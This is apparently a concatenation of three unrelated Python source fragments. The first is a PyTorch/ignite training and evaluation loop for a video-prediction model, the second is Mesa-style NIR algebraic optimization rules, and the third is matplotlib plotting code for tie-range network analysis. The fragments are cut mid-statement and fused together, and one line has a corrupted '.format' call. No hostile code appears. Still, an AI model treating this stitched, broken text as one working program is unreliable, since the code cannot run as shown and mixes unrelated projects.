grid_anim = make_video(x_t,poke,seq_vis_hat,seq_vis_gt,n_logged=n_test_img,flow=flow)
it = engine.state.iteration
log_dict = {"Last Frame Comparison Test data": wandb.Image(grid_dyn, caption=f"Last frames test grid #{it}."),
"Disentanglement Grid Test Data": wandb.Image(grid_dis, caption=f"Test grid disentanglement #{it}."),
"Video Grid Test Data": wandb.Video(grid_anim,caption=f"Test Video Grid #{it}.",fps=5)}
if self.config["testing"]["eval_app_transfer"]:
app_img_unrelated = eval_batch["app_img_random"].cuda(self.all_devices[0])
x_transferred, *_ = net(app_img_unrelated,x_t, poke,len=0)
transfer_grid = make_img_grid(app_img_unrelated,x_t,x_transferred)
log_dict.update({"Appearance transfer grid Test Data": wandb.Image(transfer_grid, caption=f"Test_grid appearance transfer #{it}")})
wandb.log(log_dict)
return None
self.logger.info("Initialize engines...")
trainer = Engine(train_step)
evaluator = Engine(eval_step)
test_img_generator = Engine(eval_visual)
self.logger.info("Finish engine initialization...")
# checkpointing
ckpt_handler = ModelCheckpoint(self.dirs["ckpt"], "reg_ckpt", n_saved=10, require_empty=False)
if self.config["training"]["two_stage"]:
save_dict = {"model": net, "optimizer_dis": optimizer_dis, "optimizer_dyn": optimizer_dyn}
else:
save_dict = {"model": net, "optimizer_dyn": optimizer_dyn}
trainer.add_event_handler(Events.ITERATION_COMPLETED(every=self.config["testing"]["ckpt_intervall"]),
ckpt_handler,
save_dict)
if self.use_gan:
ckpt_handler_disc = ModelCheckpoint(self.dirs["ckpt"], gan_trainer.load_key, n_saved=10, require_empty=False)
save_dict_disc = {"model": gan_trainer.disc, "optimizer": gan_trainer.disc_opt}
trainer.add_event_handler(Events.ITERATION_COMPLETED(every=self.config["testing"]["ckpt_intervall"]),
ckpt_handler_disc,
save_dict_disc)
if self.use_temp_disc:
ckpt_handler_disc_temp = ModelCheckpoint(self.dirs["ckpt"], gan_trainer_temp.load_key, n_saved=10, require_empty=False)
save_dict_disc_temp = {"model": gan_trainer_temp.disc, "optimizer": gan_trainer_temp.disc_opt}
trainer.add_event_handler(Events.ITERATION_COMPLETED(every=self.config["testing"]["ckpt_intervall"]),
ckpt_handler_disc_temp,
save_dict_disc_temp)
pbar = ProgressBar(ascii=True)
pbar.attach(trainer, output_transform=lambda x: x)
pbar.attach(evaluator, output_transform=lambda x: x)
#reduce the learning rate of the decoder for the image reconstruction task, such that the model focusses more on t --> tk
if self.config["training"]["two_stage"]:
@trainer.on(Events.ITERATION_COMPLETED)
def update_lr(engine):
self.lr_dec_t = lr_dec_rec(engine.state.iteration)
for g in optimizer_dis.param_groups:
if g["name"] == "decoder":
g["lr"] = self.lr_dec_t
@trainer.on(Events.ITERATION_COMPLETED(every=self.config["testing"]["log_intervall"]))
def log(engine):
it = engine.state.iteration
wandb.log({"iteration": it})
# log losses
for key in engine.state.output:
wandb.log({key: engine.state.output[key]})
data = engine.state.batch
if test_dataset.flow_weights:
poke = data["poke"][0].cuda(self.all_devices[0])
else:
poke = data["poke"].cuda(self.all_devices[0])
x_t = data["images"][:, 0].cuda(self.all_devices[0])
x_seq_gt = data["images"][:, 1:].cuda(self.all_devices[0])
if self.config["architecture"]["disentanglement"]:
shape_img = data["img_aT"].cuda(self.all_devices[0])
else:
shape_img = x_t
net.eval()
seq_len = x_seq_gt.shape[1]
with torch.no_grad():
x_seq_hat, *_ = net(x_t, x_t, poke, len=seq_len)
x_t_hat, *_ = net(x_seq_gt[:,-1], shape_img, poke,len=0)
#x_t_hat_e, *_ = net(img_aT, img_sT, poke)
grid_dis_i = make_img_grid(x_seq_gt[:,-1], shape_img, x_t_hat, x_t, n_logged=n_test_img)
grid_dyn = make_flow_grid(x_t, poke, x_seq_hat[:,-1], x_seq_gt[:,-1], n_logged=n_test_img)
seq_vis_hat = torch.cat([x_t.unsqueeze(1),x_seq_hat],1)
seq_vis_gt = torch.cat([x_t.unsqueeze(1), x_seq_gt], 1)
grid_anim = make_video(x_t,poke,seq_vis_hat,seq_vis_gt,n_logged=n_test_img)
wandb.log({"Last Frame Comparison Train Data": wandb.Image(grid_dyn, caption=f"Last frames train grid after {it} train steps."),
"Disentanglement Grid Invariance Train Data": wandb.Image(grid_dis_i, caption=f"Invariance Disentanglement Grid on train set after {it} train steps."),
"Video Grid Train Data": wandb.Video(grid_anim, caption=f"Train Video Grid after {it} train steps",fps=5)})
#"Disentanglement Grid Equivariance Train Data": wandb.Image(grid_dis_e, caption=f"Eqiuvariance Disentanglement Grid on train set after {it} train steps.")
self.logger.info("Initialize metrics...")
# compute loss average over epochs
# Average(output_transform=lambda x: x["loss_dis"]).attach(trainer, "loss_dis-epoch_avg")
Average(output_transform=lambda x: x["loss_dis"]).attach(trainer, "loss_dis-epoch_avg")
Average(output_transform=lambda x: x["vgg_loss_dyn"]).attach(trainer, "vgg_loss_dyn-epoch_avg")
Average(output_transform=lambda x: x["latent_loss_dyn"]).attach(trainer, "latent_loss_dyn-epoch_avg")
if self.config["architecture"]["disentanglement"]:
Average(output_transform=lambda x: x["style_loss"]).attach(trainer, "style_loss-epoch_avg")
Average(output_transform=lambda x: x["style_loss_eval"]).attach(evaluator, "style_loss_eval")
if self.use_norm_loss:
Average(output_transform=lambda x: x["norm_loss"]).attach(trainer, "norm_loss-epoch_avg")
Average(output_transform=lambda x: x["norm_loss"]).attach(evaluator, "norm_loss_eval")
if self.config["architecture"]["dynamics_var"]:
Average(output_transform=lambda x: x["kl_dyn"]).attach(trainer, "kl_dyn_loss-epoch_avg")
if self.use_temp_disc or self.use_gan:
def gan_training_started(engine,epoch, key="gan"):
return engine.state.iteration >= self.config[key]["start_iteration"]
if self.use_gan:
use_patchgan_metrics = MetricUsage(started=Events.EPOCH_STARTED(event_filter=gan_training_started),
completed=Events.EPOCH_COMPLETED(event_filter=gan_training_started),
iteration_completed=Events.ITERATION_COMPLETED(event_filter=gan_training_started))
# gan losses
Average(output_transform=lambda x: x["loss_gen_patch"]).attach(trainer, "loss_gen_patch-epoch_avg",usage=use_patchgan_metrics)
Average(output_transform=lambda x: x["loss_fmap_patch"]).attach(trainer, "loss_fmap_patch-epoch_avg",usage=use_patchgan_metrics)
Average(output_transform=lambda x: x["loss_disc_patch"]).attach(trainer, "loss_disc_patch-epoch_avg",usage=use_patchgan_metrics)
#if self.config["gan"]["gp_weighflow_video_generatort"] > 0:
Average(output_transform=lambda x: x["loss_gp_patch"]).attach(trainer, "loss_gp_patch-epoch_avg",usage=use_patchgan_metrics)
Average(output_transform=lambda x: x["p_""true_patch"]).attach(trainer, "p_true_patch-epoch_avg",usage=use_patchgan_metrics)
Average(output_transform=lambda x: x["p_fake_patch"]).attach(trainer, "p_fake_patch-epoch_avg",usage=use_patchgan_metrics)
@trainer.on(Events.EPOCH_COMPLETED(event_filter=gan_training_started))
def gan_stuff(engine):
gan_trainer.disc_scheduler.step()
if self.use_temp_disc:
use_tmpgan_metrics = MetricUsage(started=Events.EPOCH_STARTED(event_filter=partial(gan_training_started,key="gan_temp")),
completed=Events.EPOCH_COMPLETED(event_filter=partial(gan_training_started,key="gan_temp")),
iteration_completed=Events.ITERATION_COMPLETED(event_filter=partial(gan_training_started,key="gan_temp")))
# gan losses
Average(output_transform=lambda x: x["loss_gen_temp"]).attach(trainer, "loss_gen_temp-epoch_avg",usage=use_tmpgan_metrics)
Average(output_transform=lambda x: x["loss_fmap_temp"]).attach(trainer, "loss_fmap_temp-epoch_avg",usage=use_tmpgan_metrics)
Average(output_transform=lambda x: x["loss_disc_temp"]).attach(trainer, "loss_disc_temp-epoch_avg",usage=use_tmpgan_metrics)
#if self.config["gan"]["gp_weight"] > 0:
Average(output_transform=lambda x: x["loss_gp_temp"]).attach(trainer, "loss_gp_temp-epoch_avg",usage=use_tmpgan_metrics)
Average(output_transform=lambda x: x["p_true_temp"]).attach(trainer, "p_true_temp-epoch_avg",usage=use_tmpgan_metrics)
Average(output_transform=lambda x: x["p_fake_temp"]).attach(trainer, "p_fake_temp-epoch_avg",usage=use_tmpgan_metrics)
@trainer.on(Events.EPOCH_COMPLETED(event_filter=gan_training_started))
def temp_disc_stuff(engine):
gan_trainer_temp.disc_scheduler.step()
# if self.pixel_decoder_loss:
Average(output_transform=lambda x: x["pixel_loss_dec"]).attach(trainer, "pixel_loss_dec-epoch_avg")
Average(output_transform=lambda x: x["pixel_loss_dec_eval"]).attach(evaluator, "pixel_loss_dec_eval")
# evaluation losses
Average(output_transform=lambda x: x["vgg_loss_dyn_eval"]).attach(evaluator, "vgg_loss_dyn_eval")
Average(output_transform=lambda x: x["loss_dis_i_eval"]).attach(evaluator, "loss_dis_i_eval")
Average(output_transform=lambda x: x["latent_loss_dyn_eval"]).attach(evaluator, "latent_loss_dyn_eval")
self.logger.info("Finish metric initialization.")
@trainer.on(Events.EPOCH_COMPLETED(every=self.config["testing"]["n_epoch_metrics"]))
def metrics(engine):
# set incpetion model to cpu
self.inception_model.eval()
self.inception_model.cuda(self.all_devices[0])
self.lpips_fn.cuda(self.all_devices[0])
self.lpips_fn.eval()
if self.use_temp_disc:
gan_trainer_temp.disc.cpu()
if self.use_gan:
gan_trainer.disc.cpu()
# compute metrics over an epoch
self.logger.info(f"Computing metrics after epoch #{engine.state.epoch}")
bs = 20 if self.is_debug else (int(8000 / eval_sampler.batch_size) if len(test_dataset) > 8000 else len(eval_loader))
evaluator.run(eval_loader, max_epochs=1, epoch_length=bs)
[wandb.log({key: evaluator.state.metrics[key]}) for key in evaluator.state.metrics]
# compute metrics
ssim_t = np.mean(np.stack(self.ssims["t"], axis=0))
psnr_t = np.mean(np.stack(self.psnrs["t"], axis=0))
lpips_t = np.mean(np.concatenate(self.lpips["t"], axis=0))
ssim_tk = np.mean(np.stack(self.ssims["tk"], axis=0))
psnr_tk = np.mean(np.stack(self.psnrs["tk"], axis=0))
lpips_avg = np.mean(np.concatenate(self.lpips["tk"], axis=0))
self.lpips_avg = lpips_avg
fid_per_frame = {}
for key in tqdm(self.fid_feats_real_per_frame, desc="Computing FID per frame"):
fid_per_frame[key] = metric_fid(self.fid_feats_real_per_frame[key], self.fid_feats_fake_per_frame[key])
# fid_tk = metric_fid(self.features_real_fid["tk"], self.features_fake_fid["tk"])
fid_avg = np.mean([fid_per_frame[key] for key in fid_per_frame])
log_dict = {"ssim-t": ssim_t, "psnr-t": psnr_t, "fid-avg": fid_avg, "lpips-t": lpips_t,"ssim-tk": ssim_tk, "psnr-tk": psnr_tk, "lpips-avg": lpips_avg}
# add histograms for per-frame-metrics
self.lpips_per_frame = {key: np.concatenate(self.lpips_per_frame[key], axis=0).mean() for key in self.lpips_per_frame}
self.ssims_per_frame = {key: np.stack(self.ssims_per_frame[key], axis=0).mean() for key in self.ssims_per_frame}
self.psnrs_per_frame = {key: np.stack(self.psnrs_per_frame[key], axis=0).mean() for key in self.psnrs_per_frame}
# self.ssims_per_frame_pl = {key: np.stack(self.ssims_per_frame_pl[key], axis=0).mean() for key in self.ssims_per_frame_pl}
# self.psnrs_per_frame_pl = {key: np.stack(self.psnrs_per_frame_pl[key], axis=0).mean() for key in self.psnrs_per_frame_pl}
x = [k+1 for k in self.lpips_per_frame]
make_plot(x,list(self.lpips_per_frame.values()),"LPIPS of predicted frames", ylabel="Average LPIPS",)
make_plot(x, list(self.ssims_per_frame.values()), "SSIM of predicted frames", ylabel="Average SSIM",)
make_plot(x, list(self.psnrs_per_frame.values()), "PSNR of predicted frames", ylabel="Average PSNR",)
make_plot(x, list(fid_per_frame.values()), "FIDs of predicted frames", ylabel="FID")
wandb.log(log_dict)
# clear collection arrays
self.__clear_metric_arrs()
self.inception_model.cpu()
self.lpips_fn.cpu()
if self.use_temp_disc:
gan_trainer_temp.disc.cuda(self.all_devices[0])
if self.use_gan:
gan_trainer.disc.cuda(self.all_devices[0])
@trainer.on(Events.ITERATION_COMPLETED(every=self.config["testing"]["test_img_intervall"]))
def make_test_grid(engine):
test_img_generator.run(test_loader, max_epochs=1, epoch_length=self.config["testing"]["test_it"])
@trainer.on(Events.EPOCH_COMPLETED)
def log_train_avg(engine):
wandb.log({"epoch": engine.state.epoch})
[wandb.log({key: engine.state.metrics[key]}) for key in engine.state.metrics]
# also perform scheduler step
if self.config["training"]["two_stage"]:
scheduler_dis.step()
scheduler_dyn.step()
def score_fn(engine):
assert self.lpips_avg is not None
return -self.lpips_avg
# define best ckpt
best_ckpt_handler = ModelCheckpoint(self.dirs["ckpt"],filename_prefix="ckpt_metric" ,score_function=score_fn,score_name="lpips",n_saved=5,require_empty=False)
trainer.add_event_handler(Events.EPOCH_COMPLETED(every=self.config["testing"]["n_epoch_metrics"]),best_ckpt_handler,save_dict)
@trainer.on(Events.STARTED)
def set_start_it(engine):
self.logger.info(f'Engine starting from iteration {start_it}, epoch {start_epoch}')
engine.state.iteration = start_it
engine.state.epoch = start_epoch
# run everything
n_step_per_epoch = 10 if self.is_debug else len(train_loader)
self.logger.info("Start training...")
trainer.run(train_loader, max_epochs=n_epoch_overall, epoch_length=n_step_per_epoch)
self.logger.info("End training.")
def test(self):
from | |
b, c, d), a), 'options->lower_flrp{}'.format(s)),
(('~flrp@{}'.format(s), a, ('fmul(is_used_once)', a, b), c), ('fmul', ('flrp', 1.0, b, c), a), 'options->lower_flrp{}'.format(s)),
(('~fadd@{}'.format(s), ('fmul', a, ('fadd', 1.0, ('fneg', c))), ('fmul', b, c)), ('flrp', a, b, c), '!options->lower_flrp{}'.format(s)),
# These are the same as the previous three rules, but it depends on
# 1-fsat(x) <=> fsat(1-x). See below.
(('~fadd@{}'.format(s), ('fmul', a, ('fsat', ('fadd', 1.0, ('fneg', c)))), ('fmul', b, ('fsat', c))), ('flrp', a, b, ('fsat', c)), '!options->lower_flrp{}'.format(s)),
(('~fadd@{}'.format(s), a, ('fmul', c, ('fadd', b, ('fneg', a)))), ('flrp', a, b, c), '!options->lower_flrp{}'.format(s)),
(('~fadd@{}'.format(s), ('fmul', a, ('fadd', 1.0, ('fneg', ('b2f', 'c@1')))), ('fmul', b, ('b2f', c))), ('bcsel', c, b, a), 'options->lower_flrp{}'.format(s)),
(('~fadd@{}'.format(s), a, ('fmul', ('b2f', 'c@1'), ('fadd', b, ('fneg', a)))), ('bcsel', c, b, a), 'options->lower_flrp{}'.format(s)),
# 1 - ((1 - a) * (1 - b))
# 1 - (1 - a - b + a*b)
# 1 - 1 + a + b - a*b
# a + b - a*b
# a + b*(1 - a)
# b*(1 - a) + 1*a
# flrp(b, 1, a)
(('~fadd@{}'.format(s), 1.0, ('fneg', ('fmul', ('fadd', 1.0, ('fneg', a)), ('fadd', 1.0, ('fneg', b))))), ('flrp', b, 1.0, a), '!options->lower_flrp{}'.format(s)),
])
optimizations.extend([
(('~flrp', ('fmul(is_used_once)', a, b), ('fmul(is_used_once)', a, c), d), ('fmul', ('flrp', b, c, d), a)),
(('~flrp', a, 0.0, c), ('fadd', ('fmul', ('fneg', a), c), a)),
(('ftrunc', a), ('bcsel', ('flt', a, 0.0), ('fneg', ('ffloor', ('fabs', a))), ('ffloor', ('fabs', a))), 'options->lower_ftrunc'),
(('ffloor', a), ('fsub', a, ('ffract', a)), 'options->lower_ffloor'),
(('fadd', a, ('fneg', ('ffract', a))), ('ffloor', a), '!options->lower_ffloor'),
(('ffract', a), ('fsub', a, ('ffloor', a)), 'options->lower_ffract'),
(('fceil', a), ('fneg', ('ffloor', ('fneg', a))), 'options->lower_fceil'),
(('ffma@16', a, b, c), ('fadd', ('fmul', a, b), c), 'options->lower_ffma16'),
(('ffma@32', a, b, c), ('fadd', ('fmul', a, b), c), 'options->lower_ffma32'),
(('ffma@64', a, b, c), ('fadd', ('fmul', a, b), c), 'options->lower_ffma64'),
# Always lower inexact ffma, because it will be fused back by late optimizations (nir_opt_algebraic_late).
(('~ffma@16', a, b, c), ('fadd', ('fmul', a, b), c), 'options->fuse_ffma16'),
(('~ffma@32', a, b, c), ('fadd', ('fmul', a, b), c), 'options->fuse_ffma32'),
(('~ffma@64', a, b, c), ('fadd', ('fmul', a, b), c), 'options->fuse_ffma64'),
(('~fmul', ('fadd', ('iand', ('ineg', ('b2i', 'a@bool')), ('fmul', b, c)), '#d'), '#e'),
('bcsel', a, ('fmul', ('fadd', ('fmul', b, c), d), e), ('fmul', d, e))),
(('fdph', a, b), ('fdot4', ('vec4', 'a.x', 'a.y', 'a.z', 1.0), b), 'options->lower_fdph'),
(('fdot4', ('vec4', a, b, c, 1.0), d), ('fdph', ('vec3', a, b, c), d), '!options->lower_fdph'),
(('fdot4', ('vec4', a, 0.0, 0.0, 0.0), b), ('fmul', a, b)),
(('fdot4', ('vec4', a, b, 0.0, 0.0), c), ('fdot2', ('vec2', a, b), c)),
(('fdot4', ('vec4', a, b, c, 0.0), d), ('fdot3', ('vec3', a, b, c), d)),
(('fdot3', ('vec3', a, 0.0, 0.0), b), ('fmul', a, b)),
(('fdot3', ('vec3', a, b, 0.0), c), ('fdot2', ('vec2', a, b), c)),
(('fdot2', ('vec2', a, 0.0), b), ('fmul', a, b)),
(('fdot2', a, 1.0), ('fadd', 'a.x', 'a.y')),
# Lower fdot to fsum when it is available
(('fdot2', a, b), ('fsum2', ('fmul', a, b)), 'options->lower_fdot'),
(('fdot3', a, b), ('fsum3', ('fmul', a, b)), 'options->lower_fdot'),
(('fdot4', a, b), ('fsum4', ('fmul', a, b)), 'options->lower_fdot'),
(('fsum2', a), ('fadd', 'a.x', 'a.y'), 'options->lower_fdot'),
# If x >= 0 and x <= 1: fsat(1 - x) == 1 - fsat(x) trivially
# If x < 0: 1 - fsat(x) => 1 - 0 => 1 and fsat(1 - x) => fsat(> 1) => 1
# If x > 1: 1 - fsat(x) => 1 - 1 => 0 and fsat(1 - x) => fsat(< 0) => 0
(('~fadd', ('fneg(is_used_once)', ('fsat(is_used_once)', 'a(is_not_fmul)')), 1.0), ('fsat', ('fadd', 1.0, ('fneg', a)))),
# (a * #b + #c) << #d
# ((a * #b) << #d) + (#c << #d)
# (a * (#b << #d)) + (#c << #d)
(('ishl', ('iadd', ('imul', a, '#b'), '#c'), '#d'),
('iadd', ('imul', a, ('ishl', b, d)), ('ishl', c, d))),
# (a * #b) << #c
# a * (#b << #c)
(('ishl', ('imul', a, '#b'), '#c'), ('imul', a, ('ishl', b, c))),
])
# Care must be taken here. Shifts in NIR uses only the lower log2(bitsize)
# bits of the second source. These replacements must correctly handle the
# case where (b % bitsize) + (c % bitsize) >= bitsize.
for s in [8, 16, 32, 64]:
mask = (1 << s) - 1
ishl = "ishl@{}".<EMAIL>(s)
ishr = "ishr@{}".format(s)
ushr = "ushr@{}".format(s)
in_bounds = ('ult', ('iadd', ('iand', b, mask), ('iand', c, mask)), s)
optimizations.extend([
((ishl, (ishl, a, '#b'), '#c'), ('bcsel', in_bounds, (ishl, a, ('iadd', b, c)), 0)),
((ushr, (ushr, a, '#b'), '#c'), ('bcsel', in_bounds, (ushr, a, ('iadd', b, c)), 0)),
# To get get -1 for large shifts of negative values, ishr must instead
# clamp the shift count to the maximum value.
((ishr, (ishr, a, '#b'), '#c'),
(ishr, a, ('imin', ('iadd', ('iand', b, mask), ('iand', c, mask)), s - 1))),
])
# Optimize a pattern of address calculation created by DXVK where the offset is
# divided by 4 and then multipled by 4. This can be turned into an iand and the
# additions before can be reassociated to CSE the iand instruction.
for size, mask in ((8, 0xff), (16, 0xffff), (32, 0xffffffff), (64, 0xffffffffffffffff)):
a_sz = 'a@{}'.format(size)
optimizations.extend([
# 'a >> #b << #b' -> 'a & ~((1 << #b) - 1)'
(('ishl', ('ushr', a_sz, '#b'), b), ('iand', a, ('ishl', mask, b))),
(('ishl', ('ishr', a_sz, '#b'), b), ('iand', a, ('ishl', mask, b))),
# This does not trivially work with ishr.
(('ushr', ('ishl', a_sz, '#b'), b), ('iand', a, ('ushr', mask, b))),
])
for log2 in range(1, 7): # powers of two from 2 to 64
v = 1 << log2
mask = 0xffffffff & ~(v - 1)
b_is_multiple = '#b(is_unsigned_multiple_of_{})'.format(v)
optimizations.extend([
# Reassociate for improved CSE
(('iand@32', ('iadd@32', a, b_is_multiple), mask), ('iadd', ('iand', a, mask), b)),
])
# To save space in the state tables, reduce to the set that is known to help.
# Previously, this was range(1, 32). In addition, a couple rules inside the
# loop are commented out. Revisit someday, probably after mesa/#2635 has some
# resolution.
for i in [1, 2, 16, 24]:
lo_mask = 0xffffffff >> i
hi_mask = (0xffffffff << i) & 0xffffffff
optimizations.extend([
# This pattern seems to only help in the soft-fp64 code.
(('ishl@32', ('iand', 'a@32', lo_mask), i), ('ishl', a, i)),
# (('ushr@32', ('iand', 'a@32', hi_mask), i), ('ushr', a, i)),
# (('ishr@32', ('iand', 'a@32', hi_mask), i), ('ishr', a, i)),
(('iand', ('ishl', 'a@32', i), hi_mask), ('ishl', a, i)),
(('iand', ('ushr', 'a@32', i), lo_mask), ('ushr', a, i)),
# (('iand', ('ishr', 'a@32', i), lo_mask), ('ushr', a, i)), # Yes, ushr is correct
])
optimizations.extend([
# This is common for address calculations. Reassociating may enable the
# 'a<<c' to be CSE'd. It also helps architectures that have an ISHLADD
# instruction or a constant offset field for in load / store instructions.
(('ishl', ('iadd', a, '#b'), '#c'), ('iadd', ('ishl', a, c), ('ishl', b, c))),
# (a + #b) * #c
(('imul', ('iadd(is_used_once)', a, '#b'), '#c'), ('iadd', ('imul', a, c), ('imul', b, c))),
# Comparison simplifications
(('~inot', ('flt', a, b)), ('fge', a, b)),
(('~inot', ('fge', a, b)), ('flt', a, b)),
(('inot', ('feq', a, b)), ('fneu', a, b)),
(('inot', ('fneu', a, b)), ('feq', a, b)),
(('inot', ('ilt', a, b)), ('ige', a, b)),
(('inot', ('ult', a, b)), ('uge', a, b)),
(('inot', ('ige', a, b)), ('ilt', a, b)),
(('inot', ('uge', a, b)), ('ult', a, b)),
(('inot', ('ieq', a, b)), ('ine', a, b)),
(('inot', ('ine', a, b)), ('ieq', a, b)),
(('iand', ('feq', a, b), ('fneu', a, b)), False),
(('iand', ('flt', a, b), ('flt', b, a)), False),
(('iand', ('ieq', a, b), ('ine', a, b)), False),
(('iand', ('ilt', a, b), ('ilt', b, a)), False),
(('iand', ('ult', a, b), ('ult', b, a)), False),
# This helps some shaders because, after some optimizations, they end up
# with patterns like (-a < -b) || (b < a). In an ideal world, this sort of
# matching would be handled by CSE.
(('flt', ('fneg', a), ('fneg', b)), ('flt', b, a)),
(('fge', ('fneg', a), ('fneg', b)), ('fge', b, a)),
(('feq', ('fneg', a), ('fneg', b)), ('feq', b, a)),
(('fneu', ('fneg', a), ('fneg', | |
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#7f8c8d", ls='-', label='$=4$',
ecolor='#7f8c8d', marker='p', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [1, 2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(8)]
Y = []
Err = []
for i in range(8):
for j in range(len(avg5)):
H[i].append(mt.log(avg5[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#c0392b", ls='-', label='$=5$',
ecolor='#c0392b', marker='H', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [1, 2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(8)]
Y = []
Err = []
for i in range(8):
for j in range(len(avg6)):
H[i].append(mt.log(avg6[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#8e44ad", ls='-', label='$\geq6$',
ecolor='#8e44ad', marker='8', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.xticks([1, 2, 3, 4, 5, 6, 7, 8], ['1', '2', '3', '4', '5', '6', '7', '8'], fontsize=20)
plt.yticks(fontsize=20)
plt.xlabel("Phase", fontsize=25)
plt.ylabel("$log$(Interaction {})".format(interactions), fontsize=25)
plt.ylim([0.5, 2.5])
legend = plt.legend(frameon=False, loc='upper right', title='Tie Range in Phase 1', fontsize=20)
legend.get_title().set_fontsize(fontsize=20)
plt.title('$ND_{1}\leq5$', fontsize=30)
# plt.title('$5<ND_{1}\leq15$', fontsize=30)
# plt.title('$ND_{1}>15$', fontsize=30)
plt.subplots_adjust(left=0.17, bottom=0.11, right=0.98, top=0.935)
plt.savefig('Plots/SI/Mainresults_LowerDegree_{}.pdf'.format(interactions), format='pdf')
plt.show()
# Fig.~S12(a&b)
def Analysis_Existing(interactions):
Data = read('Results/oldedge/Graph_Season_TR_{}.txt'.format(interactions))
avg2, avg3, avg4, avg5, avg6 = [], [], [], [], []
GH = nx.read_gexf('Graph/Season/Frequency/G_Frequency_Season_1.gexf')
Large = max(nx.connected_components(GH),key=len)
for data in Data:
if data.count('-1') == 0:
if data[0] in Large and data[1] in Large:
if data[2] == '2':
avg2.append(list(map(int, map(float, data[9:]))))
if data[2] == '3':
avg3.append(list(map(int, map(float, data[9:]))))
if data[2] == '4':
avg4.append(list(map(int, map(float, data[9:]))))
if data[2] == '5':
avg5.append(list(map(int, map(float, data[9:]))))
if int(data[2]) >= 6 and int(data[2]) < 100:
avg6.append(list(map(int, map(float, data[9:]))))
fig = plt.figure(figsize=(7, 7))
ax = plt.axes()
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg2)):
H[i].append(mt.log(avg2[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#34495e", ls='-', label='$=2$',
ecolor='#34495e', marker='^', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg3)):
H[i].append(mt.log(avg3[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#2980b9", ls='-', label='$=3$',
ecolor='#2980b9', marker='s', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg4)):
H[i].append(mt.log(avg4[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#7f8c8d", ls='-', label='$=4$',
ecolor='#7f8c8d', marker='p', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg5)):
H[i].append(mt.log(avg5[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#c0392b", ls='-', label='$=5$',
ecolor='#c0392b', marker='H', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg6)):
H[i].append(mt.log(avg6[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#8e44ad", ls='-', label='$\geq6$',
ecolor='#8e44ad', marker='8', markersize=10, linewidth=2, elinewidth=0.5, capsize=4)
ax.spines['top'].set_visible(False)
ax.spines['right'].set_visible(False)
plt.xticks([2, 3, 4, 5, 6, 7, 8], ['2', '3', '4', '5', '6', '7', '8'], fontsize=20)
plt.yticks(fontsize=20)
plt.xlabel("Phase", fontsize=25)
plt.ylabel("$log$(Interaction {})".format(interactions), fontsize=25)
legend = plt.legend(frameon=False, loc='upper right', title='Tie Range in Phase 2', fontsize=20)
legend.get_title().set_fontsize(fontsize=20)
plt.title('Existing Ties',fontsize=30)
if interactions == 'Duration':
plt.ylim([1, 8])
plt.subplots_adjust(left=0.11, bottom=0.11, right=0.98, top=0.935)
plt.savefig('Plots/SI/Mainresults_ExistingTies_D.pdf', format='pdf')
if interactions == 'Frequency':
plt.ylim([0.5, 3])
plt.subplots_adjust(left=0.145, bottom=0.11, right=0.98, top=0.935)
plt.savefig('Plots/SI/Mainresults_ExistingTies_F.pdf', format='pdf')
plt.show()
# Fig.~S12(d&e)
def Analysis_Newlyformed(interactions):
Data = read('Results/newedge/Graph_Season_TR_{}.txt'.format(interactions))
avg2, avg3, avg4, avg5, avg6 = [], [], [], [], []
GH = nx.read_gexf('Graph/Season/Frequency/G_Frequency_Season_1.gexf')
Large = max(nx.connected_components(GH),key=len)
for data in Data:
if data.count('-1') == 0:
if data[0] in Large and data[1] in Large:
if data[2] == '2':
avg2.append(list(map(int, map(float, data[9:]))))
if data[2] == '3':
avg3.append(list(map(int, map(float, data[9:]))))
if data[2] == '4':
avg4.append(list(map(int, map(float, data[9:]))))
if data[2] == '5':
avg5.append(list(map(int, map(float, data[9:]))))
if int(data[2]) >= 6 and int(data[2]) < 100:
avg6.append(list(map(int, map(float, data[9:]))))
fig = plt.figure(figsize=(7, 7))
ax = plt.axes()
X = [2, 3, 4, 5, 6, 7, 8]
H = [[] for i in range(7)]
Y = []
Err = []
for i in range(7):
for j in range(len(avg2)):
H[i].append(mt.log(avg2[j][i] + 1))
Y.append(np.mean(H[i]))
Err.append(mean_confidence_interval(H[i]))
plt.errorbar(x=X, y=Y, yerr=Err, fmt="o", color="#34495e", ls='--', label='$=2$',
